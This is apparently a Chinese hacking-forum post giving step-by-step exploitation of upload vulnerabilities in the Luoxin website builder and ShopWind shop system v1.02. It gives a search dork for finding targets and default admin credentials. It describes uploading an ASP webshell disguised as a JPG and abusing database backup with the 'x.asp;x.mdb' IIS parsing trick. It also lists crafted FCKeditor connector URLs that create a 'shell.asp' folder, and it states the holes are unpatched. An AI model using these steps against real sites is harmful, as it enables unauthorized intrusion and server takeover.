ShopWind网店系统与罗信网络建站 v1.02 上传漏洞
罗信网络建站系统oday
百度 or google "技术支持:罗信网络"
后台地址: site+lx
数据库地址: site+lx+databases+主域名.asp(需要猜测)
帐号&密码: admin admin
下来就是拿shell
重要部分: 上传jpg格式的asp马
数据库备份,请注意,这里只能备份后缀为mdb格式的.
那我们怎么备份呢?
还记得之前x.asp;x.jpg格式吗?
对 我们依靠这个 备份格式为: x.asp;x.mdb
ok之后访问我们的备份shell
在线编辑器: site+/lx/edit/admin_login.asp
在线编辑器数据库地址 site/lx/edit/db/%23edit.mdb
注释:官方未修补
====================yd分界线====================
shopwind网店系统 v1.02 上传漏洞
author:lan3a
这个程序用的是fckeditor 编辑器
利用2003的解析问题。直接说利用方法!
第一步:
fckeditor/editor/filemanager/connectors/asp/connector.asp?command=createfolder&type=image¤tfolder=%2fshell.asp&newfoldername=z&uuid=1244789975684
第二步:
fckeditor/editor/filemanager/browser/default/browser.html?type=image&connector=../../connectors/asp/connector.asp
如对本文有疑问,
点击进行留言回复!!
相关文章:
-
-
-
-
-
-
-
-
-
-
关于XSS漏洞另一个攻击趋势
XSS漏洞一般是基于WEB程序的输入输出问题,但最近80SEC开始发现了一系列以IE为内核的第三方浏览器的漏洞,在评估其中的XSS漏洞,我们发现了基于浏览器软件...
[阅读全文]
-
网友评论